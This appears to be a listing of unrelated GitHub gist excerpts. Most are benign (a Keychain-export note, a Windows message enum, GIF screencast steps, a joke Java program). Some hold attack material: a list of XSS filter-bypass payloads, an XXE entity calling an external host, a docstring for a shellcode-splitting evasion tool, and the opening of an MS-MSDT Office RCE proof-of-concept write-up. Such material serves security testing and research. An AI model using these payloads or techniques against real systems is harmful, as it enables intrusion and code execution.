OtterHacker

"""
Transform a binary file into a C header file.
The binary file is splitted into 16 char strings and rebuild at execution time.

The function buildsc() must be called in your main to rebuild the binary file into the sc C variable.
The length is set in the sc_length variable.

Be carefull, try to avoid compiler code optimization as it will remove all these modifications in the final binary.
"""

JohannesHoppe

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

rmondello

Exporting (iCloud) Keychain and Safari credentials to a CSV file

Update (October 2021)

Exporting password + one-time code data from iCloud Keychain is now officially supported in macOS Monterey and Safari 15 (for Monterey, Big Sur, and Catalina). You can access it in the Password Manager’s “gear” icon (System Preferences > Passwords on Monterey, and Safari > Passwords everywhere else), or via the File > Export > Passwords... menu item). You shouldn't need to hack up your own exporter anymore.

Original, Obsolete Content (2014)

After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

amgine

namespace NAMESPACE
{
	public enum WindowsMessage
	{
		WM_NULL                        = 0x0000,
		WM_CREATE                      = 0x0001,
		WM_DESTROY                     = 0x0002,
		WM_MOVE                        = 0x0003,
		WM_SIZE                        = 0x0005,
		WM_ACTIVATE                    = 0x0006,

tothi

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

dergachev

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

lolzballs

import java.io.FileDescriptor;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;

public class HelloWorld{
	private static HelloWorld instance;
    public static void main(String[] args){
        instantiateHelloWorldMainClassAndRun();